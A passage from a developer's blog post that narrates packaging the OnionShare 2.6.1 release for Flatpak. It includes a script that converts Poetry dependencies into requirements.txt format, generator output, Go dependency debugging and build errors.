<p>Okay... this time it's crashing because <code>parsed_lockfile["metadata"]</code> doesn't have a <code>files</code> key. You can see this line of code in the code block above. Notice the comments:</p>
<ul>
<li><code># Check for old metadata format (poetry version < 1.0.0b2)</code></li>
<li><code># Else new metadata format</code></li>
</ul>
<p>This makes me think there may be yet <em>another</em> new Poetry metadata format that my current <code>poetry.lock</code> file is using, but that <code>flatpak-poetry-generator.py</code> doesn't know about yet, which is why it's crashing. Sure enough, when I open <code>cli/poetry.lock</code>, it includes a comment at the top saying:</p>
<pre><code># This file is automatically @generated by Poetry 1.5.1 and should not be changed by hand.
</code></pre>
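<p>For reference, lockfiles from newer Poetry versions store the file hashes under each package's own <code>files</code> key (as in the <code>bidict</code> entry above) instead of under <code>metadata.files</code>. A hash lookup that tolerated all three layouts might look roughly like this; this is a sketch of the idea, not the actual <code>flatpak-poetry-generator.py</code> code:</p>

```python
def get_package_hashes(parsed_lockfile: dict, package: dict) -> list:
    metadata = parsed_lockfile.get("metadata", {})
    # Oldest format (poetry < 1.0.0b2): hashes under metadata.hashes
    if "hashes" in metadata:
        return metadata["hashes"][package["name"]]
    # Intermediate format: per-package file lists under metadata.files
    if "files" in metadata:
        return [f["hash"] for f in metadata["files"][package["name"]]]
    # Newest format: files live on the package entry itself
    return [f["hash"] for f in package.get("files", [])]
```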
<p><em>"This is too much work,"</em> I thought to myself.</p>
<p>So I decided to shift gears. I opened <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371">a bug report</a> in the flatpak-builder-tools repo describing the crashes I'd encountered. I'm going to stop trying to use <code>flatpak-poetry-generator.py</code> and instead just use the <a href="https://github.com/flatpak/flatpak-builder-tools/tree/master/pip">Flatpak PIP Generator</a> for this.</p>
<h3 id="adding-poetry-to-requirements-txt-script">Adding Poetry to <code>requirements.txt</code> script</h3><p>The Flatpak PIP Generator let's you pass in a Python <code>requirements.txt</code> file as input and it generates a Flatpak manifest for those Python dependencies, in JSON format. Instead of trying to deal with <code>poetry.lock</code> files, I decided to write a script that converts the <code>pyproject.toml</code> files (where all of my Poetry dependencies are defined) into <code>requirements.txt</code> files. Here's the <code>flatpak/poetry-to-requirements.py</code> I just wrote:</p>
<div class="hll"><pre><span></span><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">toml</span>
<span class="kn">import</span> <span class="nn">click</span>
<span class="k">def</span> <span class="nf">format_version</span><span class="p">(</span><span class="n">dep</span><span class="p">,</span> <span class="n">version</span><span class="p">):</span>
<span class="k">if</span> <span class="n">version</span> <span class="o">==</span> <span class="s2">"*"</span><span class="p">:</span>
<span class="k">return</span> <span class="n">dep</span>
<span class="c1"># If it's a dictionary, assume it's in the format {extras = ["socks"], version = "*"}</span>
<span class="k">elif</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">version</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">and</span> <span class="s2">"version"</span> <span class="ow">in</span> <span class="n">version</span><span class="p">:</span>
<span class="n">version</span> <span class="o">=</span> <span class="n">version</span><span class="p">[</span><span class="s2">"version"</span><span class="p">]</span>
<span class="k">if</span> <span class="n">version</span> <span class="o">==</span> <span class="s2">"*"</span><span class="p">:</span>
<span class="k">return</span> <span class="n">dep</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">"^"</span><span class="p">):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">>=</span><span class="si">{</span><span class="n">version</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span><span class="si">}</span><span class="s2">.0"</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">((</span><span class="s2">">="</span><span class="p">,</span> <span class="s2">"<="</span><span class="p">,</span> <span class="s2">"!="</span><span class="p">,</span> <span class="s2">"=="</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">,</span> <span class="s2">">"</span><span class="p">)):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">==</span><span class="si">{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">"^"</span><span class="p">):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">>=</span><span class="si">{</span><span class="n">version</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span><span class="si">}</span><span class="s2">.0"</span>
<span class="k">elif</span> <span class="n">version</span><span class="o">.</span><span class="n">startswith</span><span class="p">((</span><span class="s2">">="</span><span class="p">,</span> <span class="s2">"<="</span><span class="p">,</span> <span class="s2">"!="</span><span class="p">,</span> <span class="s2">"=="</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">,</span> <span class="s2">">"</span><span class="p">)):</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">dep</span><span class="si">}</span><span class="s2">==</span><span class="si">{</span><span class="n">version</span><span class="si">}</span><span class="s2">"</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"pyproject_filename"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">poetry_to_requirements</span><span class="p">(</span><span class="n">pyproject_filename</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Convert poetry dependencies in a pyproject.toml to requirements format."""</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">pyproject_filename</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">toml</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">dependencies</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"tool"</span><span class="p">,</span> <span class="p">{})</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"poetry"</span><span class="p">,</span> <span class="p">{})</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"dependencies"</span><span class="p">,</span> <span class="p">{})</span>
<span class="n">requirements</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">dep</span><span class="p">,</span> <span class="n">version</span> <span class="ow">in</span> <span class="n">dependencies</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">dep</span> <span class="o">==</span> <span class="s2">"python"</span> <span class="ow">or</span> <span class="n">dep</span> <span class="o">==</span> <span class="s2">"onionshare_cli"</span><span class="p">:</span>
<span class="k">continue</span>
<span class="n">formatted</span> <span class="o">=</span> <span class="n">format_version</span><span class="p">(</span><span class="n">dep</span><span class="p">,</span> <span class="n">version</span><span class="p">)</span>
<span class="k">if</span> <span class="n">formatted</span><span class="p">:</span>
<span class="n">requirements</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">formatted</span><span class="p">)</span>
<span class="k">for</span> <span class="n">req</span> <span class="ow">in</span> <span class="n">requirements</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">req</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">poetry_to_requirements</span><span class="p">()</span>
</pre></div>
<p>Here's the output when I run it on <code>cli/pyproject.toml</code>:</p>
<pre><code>$ ./poetry-to-requirements.py ../cli/pyproject.toml
click
flask==2.3.2
flask-compress>=1.13.0
flask-socketio==5.3.4
psutil
pysocks
requests
unidecode
urllib3
eventlet
setuptools
pynacl
colorama
gevent-websocket
stem==1.8.1
waitress>=2.1.2.0
werkzeug>=2.3.4
</code></pre>
<p>And here's the output when I run it on <code>desktop/pyproject.toml</code>:</p>
<pre><code>$ ./poetry-to-requirements.py ../desktop/pyproject.toml
PySide6==6.5.2
qrcode
werkzeug
python-gnupg
</code></pre>
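<p>To make the version conversion concrete, here's how the script's <code>format_version</code> logic maps a few Poetry specifiers to requirements syntax (a simplified copy of the rules above, minus the dict-handling branch; note the deliberately crude caret handling, which just turns <code>^2.1.2</code> into a plain lower bound):</p>

```python
def format_version(dep, version):
    # Simplified copy of the rules in poetry-to-requirements.py
    if version == "*":
        return dep                               # e.g. psutil
    elif version.startswith("^"):
        return f"{dep}>={version[1:]}.0"         # e.g. waitress>=2.1.2.0
    elif version.startswith((">=", "<=", "!=", "==", "<", ">")):
        return f"{dep}{version}"                 # e.g. werkzeug>=2.3.4
    else:
        return f"{dep}=={version}"               # e.g. flask==2.3.2

print(format_version("waitress", "^2.1.2"))  # waitress>=2.1.2.0
```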
<p>Excellent. So, now I'm going to use this new script, along with <code>flatpak-pip-generator</code> from flatpak-builder-tools:</p>
<pre><code>$ cd flatpak-builder-tools/pip
$ ./flatpak-pip-generator $(../../onionshare/flatpak/poetry-to-requirements.py ../../onionshare/cli/pyproject.toml)
========================================================================
Downloading sources
========================================================================
Running: "pip3 download --exists-action=i --dest /tmp/pip-generator-python3-modules7s7_v9xw -r /tmp/requirements.gnj3l2ng"
Collecting click
Using cached click-8.1.7-py3-none-any.whl (97 kB)
Collecting flask==2.3.2
Using cached Flask-2.3.2-py3-none-any.whl (96 kB)
--snip--
Generating dependencies for stem
Generating dependencies for waitress
Generating dependencies for werkzeug
Output saved to python3-modules.json
</code></pre>
<p>It created the file <code>python3-modules.json</code> (in JSON format), so I'm going to use the script that comes with flatpak-builder-tools to convert it to YAML:</p>
<div class="hll"><pre><span></span>../flatpak-json2yaml.py<span class="w"> </span>./python3-modules.json
mv<span class="w"> </span>python3-modules.yml<span class="w"> </span>onionshare-cli.yaml
</pre></div>
<p>Now <code>onionshare-cli.yaml</code> should have the CLI dependencies. While I'm at it, I'll do the same thing for the GUI version:</p>
<pre><code>$ ./flatpak-pip-generator $(../../onionshare/flatpak/poetry-to-requirements.py ../../onionshare/desktop/pyproject.toml)
========================================================================
Downloading sources
========================================================================
Running: "pip3 download --exists-action=i --dest /tmp/pip-generator-python3-modulesjl9ykpn9 -r /tmp/requirements.05kucdaf"
Collecting PySide6==6.5.2
Downloading PySide6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (6.7 kB)
Collecting qrcode
Downloading qrcode-7.4.2-py3-none-any.whl (46 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 46.2/46.2 kB 958.3 kB/s eta 0:00:00
Collecting werkzeug
Using cached werkzeug-2.3.7-py3-none-any.whl (242 kB)
Collecting python-gnupg
Downloading python_gnupg-0.5.1-py2.py3-none-any.whl (20 kB)
Collecting shiboken6==6.5.2
Downloading shiboken6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (174 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 174.2/174.2 kB 4.0 MB/s eta 0:00:00
Collecting PySide6-Essentials==6.5.2
Downloading PySide6_Essentials-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (81.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 81.2/81.2 MB 10.0 MB/s eta 0:00:00
Collecting PySide6-Addons==6.5.2
Downloading PySide6_Addons-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (126.3 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 126.3/126.3 MB 7.9 MB/s eta 0:00:00
Collecting typing-extensions
Downloading typing_extensions-4.7.1-py3-none-any.whl (33 kB)
Collecting pypng
Downloading pypng-0.20220715.0-py3-none-any.whl (58 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 58.1/58.1 kB 3.7 MB/s eta 0:00:00
Collecting MarkupSafe>=2.1.1
Using cached MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (28 kB)
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/PySide6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/PySide6_Addons-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/PySide6_Essentials-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/shiboken6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/qrcode-7.4.2-py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/werkzeug-2.3.7-py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/python_gnupg-0.5.1-py2.py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/pypng-0.20220715.0-py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/typing_extensions-4.7.1-py3-none-any.whl
Successfully downloaded PySide6 PySide6-Addons PySide6-Essentials shiboken6 qrcode werkzeug python-gnupg MarkupSafe pypng typing-extensions
========================================================================
Downloading arch independent packages
========================================================================
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/pip/./flatpak-pip-generator", line 291, in <module>
url = get_tar_package_url_pypi(name, version)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/pip/./flatpak-pip-generator", line 91, in get_tar_package_url_pypi
raise Exception(err)
Exception: Failed to get shiboken6-6.5.2 source from https://pypi.org/pypi/shiboken6/6.5.2/json
</code></pre>
<p>Ahh yes, I knew there was a reason why I manually included PySide6 in the Flatpak manifest earlier: you can't download architecture-independent versions of it from PyPI, since it's only available for x86_64. I'll handle this by just grepping PySide6 out of the generated requirements:</p>
<div class="hll"><pre><span></span>./flatpak-pip-generator<span class="w"> </span><span class="k">$(</span>../../onionshare/flatpak/poetry-to-requirements.py<span class="w"> </span>../../onionshare/desktop/pyproject.toml<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-v<span class="w"> </span>PySide6<span class="k">)</span>
</pre></div>
<p>That worked and generated a new <code>python3-modules.json</code>. Now I'll convert it to YAML too.</p>
<div class="hll"><pre><span></span>../flatpak-json2yaml.py<span class="w"> </span>./python3-modules.json
mv<span class="w"> </span>python3-modules.yml<span class="w"> </span>onionshare-desktop.yaml
</pre></div>
<p>Now that I have <code>onionshare-desktop.yaml</code> and <code>onionshare-cli.yaml</code>, I'm opening these files and copying and pasting the content into my Flatpak manifest for the <code>onionshare</code> and <code>onionshare-cli</code> modules. I'm finally ready to test it!</p>
<p>I updated <code>RELEASE.md</code> to explain all of these new steps, including using the new <code>poetry-to-requirements.py</code> script I wrote, and committed my changes.</p>
<h3 id="testing-flatpak">Testing Flatpak</h3><p>Alright, let's build the Flatpak package:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
Dependency Sdk: org.kde.Sdk 6.4
Installing org.kde.Sdk/x86_64/6.4 from flathub
Info: org.kde.Sdk is end-of-life, with reason: We strongly recommend moving to the latest stable version of the Plaform and SDK
Info: org.kde.Sdk.Locale is end-of-life, with reason: We strongly recommend moving to the latest stable version of the Plaform and SDK
Installing runtime/org.freedesktop.Platform.GL.default/x86_64/22.08
Installing runtime/org.freedesktop.Platform.GL.default/x86_64/22.08-extra
^C
</code></pre>
<p>I pressed CTRL-C to cancel early because I noticed this warning:</p>
<blockquote><p>Info: org.kde.Sdk is end-of-life, with reason: We strongly recommend moving to the latest stable version of the Plaform and SDK</p>
</blockquote>
<p>When I run <code>flatpak search org.kde.Sdk</code> I see that the latest version of the <code>org.kde.Sdk</code> runtime is 6.5, but my Flatpak manifest file is using 6.4. I updated it to 6.5 and then tried again:</p>
<pre><code>flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
</code></pre>
<p>Great, it's not showing the warning when I use the new runtime. However, when it got to the "downloading sources" step, it crashed with this error:</p>
<pre><code>Initialized empty Git repository in /home/user/code/onionshare/.flatpak-builder/git/https_filippo.io_edwards25519.git-3QRMA2/
remote: 404 page not found
fatal: repository 'https://filippo.io/edwards25519.git/' not found
Failed to download sources: module obfs4proxy: Child process exited with code 128
</code></pre>
<p>Unfortunately, it looks like there's an issue with my Go dependencies, which basically means there's an issue with the <code>flatpak-go-deps.py</code> script I wrote in <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">my flatpak-builder-tools PR</a>. <em>🎵 Debugging noises... 🎵</em></p>
<h3 id="fixing-flatpak-go-deps-py-script">Fixing <code>flatpak-go-deps.py</code> script</h3><p>Here's the source from the Flatpak manifest that the <code>flatpak-builder</code> command above choked on:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/filippo/io/edwards25519</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.0.0-rc.1.0.20210721174708-390f27c3be20</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://filippo.io/edwards25519.git</span>
</pre></div>
<p>After spending a lot of time looking into how Go package resolution works, and how Go figures out the git URLs for packages, I realized that I needed to update my <code>flatpak-go-deps.py</code> script to make HTTP requests and parse the responses in order to accurately discover git URLs.</p>
<p>It turns out that even though there's a Go package called <code>filippo.io/edwards25519</code>, and Go package names tend to map to git repo URLs, this isn't always the case: <code>https://filippo.io/edwards25519.git</code> is not a valid git repo URL. I needed to make my code send an HTTP request to <code>https://filippo.io/edwards25519/?go-get=1</code> and then use BeautifulSoup to parse the response for a <code>go-import</code> meta tag; <em>that</em> tag contains the real git URL, which in this case is <code>https://github.com/FiloSottile/edwards25519</code>.</p>
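<p>The parsing half of that is simple enough to sketch without BeautifulSoup. The tag format shown in the comment follows Go's vanity-import convention; the function name and regex are mine, not from <code>flatpak-go-deps.py</code>:</p>

```python
import re

# A ?go-get=1 page contains a tag like:
# <meta name="go-import" content="filippo.io/edwards25519 git https://github.com/FiloSottile/edwards25519">
GO_IMPORT_RE = re.compile(r'<meta\s+name="go-import"\s+content="(\S+)\s+(\S+)\s+(\S+)"')

def parse_go_import(html: str) -> str:
    """Extract the real git repo URL from a ?go-get=1 response body."""
    match = GO_IMPORT_RE.search(html)
    if match is None:
        raise ValueError("no go-import meta tag found")
    _import_prefix, _vcs, repo_url = match.groups()
    return repo_url
```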
<p>But that wasn't the only problem. There were <em>many</em> more, including:</p>
<ul>
<li>The GitLab server that hosts code for <code>meek-client</code> and <code>snowflake-client</code>, <code>git.torproject.org</code>, didn't seem to work properly with <code>?go-get=1</code> requests, so I had to make an exception for that.</li>
<li>I discovered that sometimes Go packages are pinned to git tags, but other times they're pinned to individual commits. In the block above it says the tag is <code>v1.0.0-rc.1.0.20210721174708-390f27c3be20</code>, but that's not a real git tag. Instead, it's pinned to a commit, and the short version of the commit ID is <code>390f27c3be20</code>.</li>
<li>I realized this would be much more stable if I just used commit IDs instead of tags for everything, so I started making the code git clone every repo and check out the correct tag so that it could look up the commit IDs.</li>
<li>But then I realized that this takes <em>forever</em> to run and has to download gigabytes of source code, so I streamlined it by using the GitHub API for github.com sources, and the GitLab API for gitlab.com sources. This made it way faster, but I also started hitting GitHub API rate limits, so I added support for passing in a GitHub token to avoid the rate limits.</li>
<li>There's a lot more to this particular rabbit hole too, but I'll spare the rest of the details... In short, I still haven't gotten it working all the way. 😭</li>
</ul>
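<p>That tag-versus-commit distinction is at least mechanical to detect: Go pseudo-versions always end in a 14-digit timestamp followed by a 12-character short commit ID. A quick check along those lines (a sketch of the heuristic, not the script's exact code):</p>

```python
import re

def pseudo_version_commit(version: str):
    """Return the short commit ID if `version` is a Go pseudo-version
    (ends in -yyyymmddhhmmss-abcdefabcdef), else None for a real tag."""
    match = re.fullmatch(r".*\d{14}-([0-9a-f]{12})", version)
    return match.group(1) if match else None

print(pseudo_version_commit("v1.0.0-rc.1.0.20210721174708-390f27c3be20"))  # 390f27c3be20
print(pseudo_version_commit("v1.0.0"))  # None
```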
<p>In all, I spent about 6 hours (!?) fighting with my <code>flatpak-go-deps.py</code> script.</p>
<p>Instead of continuing the suffering, I decided that I just won't update the pluggable transports in the Flatpak version of this release. The versions running in OnionShare 2.6 don't have any security issues, so this will be a future me problem.</p>
<p>After all that work, I went ahead and replaced the <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code> sections of the Flatpak manifest file with the versions from OnionShare 2.6.</p>
<h3 id="giving-up-on-go-dependencies-and-finishing-flatpak-packaging">Giving up on Go dependencies, and finishing Flatpak packaging</h3><p>And now, <em>finally</em>, the Flatpak package actually builds:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Installing app/org.onionshare.OnionShare/x86_64/master
Pruning cache
</code></pre>
<p>Here's what happens when I try running it:</p>
<pre><code>$ flatpak run org.onionshare.OnionShare
Traceback (most recent call last):
  File "/app/bin/onionshare", line 33, in <module>
    sys.exit(load_entry_point('onionshare==2.6.1', 'console_scripts', 'onionshare')())
  File "/app/bin/onionshare", line 22, in importlib_load_entry_point
    for entry_point in distribution(dist_name).entry_points
  File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 969, in distribution
    return Distribution.from_name(distribution_name)
  File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 548, in from_name
    raise PackageNotFoundError(name)
importlib.metadata.PackageNotFoundError: No package metadata was found for onionshare
</code></pre>
<p>Looking at the <code>flatpak-builder</code> logs, the <code>onionshare-cli</code> and <code>onionshare</code> Python packages actually failed with errors. Here are the logs for the <code>onionshare-cli</code> part:</p>
<pre><code>========================================================================
Building module onionshare-cli in /home/user/code/onionshare/.flatpak-builder/build/onionshare-cli-1
========================================================================
Running: cd cli && python3 setup.py install --prefix=${FLATPAK_DEST}
running install
/usr/lib/python3.10/site-packages/setuptools/_distutils/cmd.py:66: SetuptoolsDeprecationWarning: setup.py install is deprecated.
!!
********************************************************************************
Please avoid running ``setup.py`` directly.
Instead, use pypa/build, pypa/installer or other
standards-based tools.
See https://blog.ganssle.io/articles/2021/10/setup-py-deprecated.html for details.
********************************************************************************
!!
self.initialize_options()
/usr/lib/python3.10/site-packages/setuptools/_distutils/cmd.py:66: EasyInstallDeprecationWarning: easy_install command is deprecated.
!!
********************************************************************************
Please avoid running ``setup.py`` and ``easy_install``.
Instead, use pypa/build, pypa/installer or other
standards-based tools.
See https://github.com/pypa/setuptools/issues/917 for details.
********************************************************************************
!!
self.initialize_options()
Checking .pth file support in /app/lib/python3.10/site-packages/
/usr/bin/python3 -E -c pass
TEST FAILED: /app/lib/python3.10/site-packages/ does NOT support .pth files
bad install directory or PYTHONPATH
You are attempting to install a package to a directory that is not
on PYTHONPATH and which Python does not read ".pth" files from. The
installation directory you specified (via --install-dir, --prefix, or
the distutils default setting) was:
/app/lib/python3.10/site-packages/
and your PYTHONPATH environment variable currently contains:
''
Here are some of your options for correcting the problem:
* You can choose a different installation directory, i.e., one that is
on PYTHONPATH or supports .pth files
* You can add the installation directory to the PYTHONPATH environment
variable. (It must then also be on PYTHONPATH whenever you run
Python and want to use the package(s) you are installing.)
* You can set up the installation directory to support ".pth" files by
using one of the approaches described here:
https://setuptools.pypa.io/en/latest/deprecated/easy_install.html#custom-installation-locations
Please make the appropriate changes for your system and try again.
</code></pre>
<p>Here's the beginning of the <code>onionshare-cli</code> module in the Flatpak manifest:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && python3 setup.py install --prefix=${FLATPAK_DEST}</span>
</pre></div>
<p>According to the error message, running <code>setup.py</code> directly is now deprecated. So, I replaced that build command with:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>cli<span class="w"> </span><span class="o">&&</span><span class="w"> </span>pip3<span class="w"> </span>install<span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span><span class="w"> </span>--no-deps<span class="w"> </span>.
</pre></div>
<p>The <code>onionshare</code> module (the desktop version of the app) similarly was running <code>setup.py</code> directly, so I replaced that one too.</p>
<p>Then, I tried building the Flatpak package again:</p>
<pre><code>$ flatpak-builder build --force-clean --jobs=$(nproc) --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
========================================================================
Building module onionshare-cli in /home/user/code/onionshare/.flatpak-builder/build/onionshare-cli-1
========================================================================
Running: cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .
Processing /run/build/onionshare-cli/cli
Installing build dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> [7 lines of output]
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e1bbe0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=3, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e1bf10>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e1bfd0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e503a0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e50550>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
ERROR: Could not find a version that satisfies the requirement poetry-core (from versions: none)
ERROR: No matching distribution found for poetry-core
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.
note: This error originates from a subprocess, and is likely not a problem with pip.
Error: module onionshare-cli: Child process exited with code 1
</code></pre>
<p><em>🎵 Debugging noises drowning out all other sounds... 🎵</em></p>
<p>It's getting late on a Sunday night, so I think this is a good time to commit my code so far and then give up for the time being.</p>
<h2 id="pushing-back-the-release-date">Pushing back the release date</h2><p>In a few days, I'm going to Portugal for the <a href="https://wiki.digitalrights.community/index.php?title=Global_Gathering">Global Gathering Feira</a> where I'll get to hang out with human rights activists who specialize in internet freedom, many of whom I haven't seen in forever, and also meet new ones! During the event, I will do a two-hour project showcase for OnionShare, where people can come by and ask questions about the project. I'll also do a separate project showcase for my upcoming book, <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>.</p>
<p>Last week I decided to sit down and make the OnionShare 2.6.1 release before the Global Gathering. So far I've spent (<em>...checks notes...</em>) <strong>22 hours</strong> working on this release (and writing this blog post along with it), and I still haven't even finished Linux packaging yet. It's clear that I'm not going to make my goal of finishing the release before going to Portugal. Instead, I'll finish it when I get back.</p>
<p>I've pushed all of my code:</p>
<ul>
<li>The code for this release is in the <a href="https://github.com/onionshare/onionshare/tree/release-2.6.1"><code>release-2.6.1</code> branch</a>, and here's the associated work-in-progress pull request: <a href="https://github.com/onionshare/onionshare/pull/1749">https://github.com/onionshare/onionshare/pull/1749</a></li>
<li>My work-in-progress pull request to fix Go support in flatpak-builder-tools is here: <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">https://github.com/flatpak/flatpak-builder-tools/pull/369</a></li>
</ul>
<p>If you're interested, feel free to fix all of these issues I'm running into while I'm gone! I will happily review your work and merge it into my PR.</p>
